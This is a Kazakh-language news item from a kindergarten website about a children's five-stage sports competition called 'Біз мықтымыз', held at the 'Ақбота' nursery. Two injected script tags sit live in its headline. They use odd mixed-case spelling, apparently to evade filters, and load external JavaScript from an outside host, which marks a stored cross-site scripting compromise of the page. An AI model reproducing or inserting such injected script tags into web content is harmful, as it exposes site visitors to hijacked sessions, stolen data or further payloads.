«Біз мықтымыз» атты спорттық іс-шара<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

16.07.2021

Уәлиханов көшесіндегі «Ақбота» бөбекжайында ортаңғы  топтарда  «Біз мықтымыз»  атты   спорттық іс-шара дене тәрбиесі жөніндегі нұсқаушысы Шайдулин Кайдар Шаймуратовичтың ұйымдастыруымен өткізілді.  Іс-шара барысында балалар екі  топқа бөлініп сайысқа түсті. Сайыс бес кезеңмен өтті.  1 кезең: «Кенгуру» осы сайыста балалар кедергілерден секіріп, жүгірді. 2 кезең: «Кім жылдам?» сайыста жылдамдыққа жүгіріп, допшаларды межеліден алып, өздерінін шелекшелерін толтырды.                                                3 кезең: «Мен бірінші» сайыста кедергілер астынан еңбектеп өтті. 4 кезең: «Сиқырлы доп»  сайыста доппен кедергілер арасымен жылдамдыққа жүгірді. 5 кезең: «Аламан бәйге» сайыста таяқшадағы атқа отырып, жарысты. Іс-шара қызықты өтті, балалар белсенді қатысқан үшін марапатталды.

Просмотров: 252


Пікір қосу



Деректерді қолтаңбаға қосу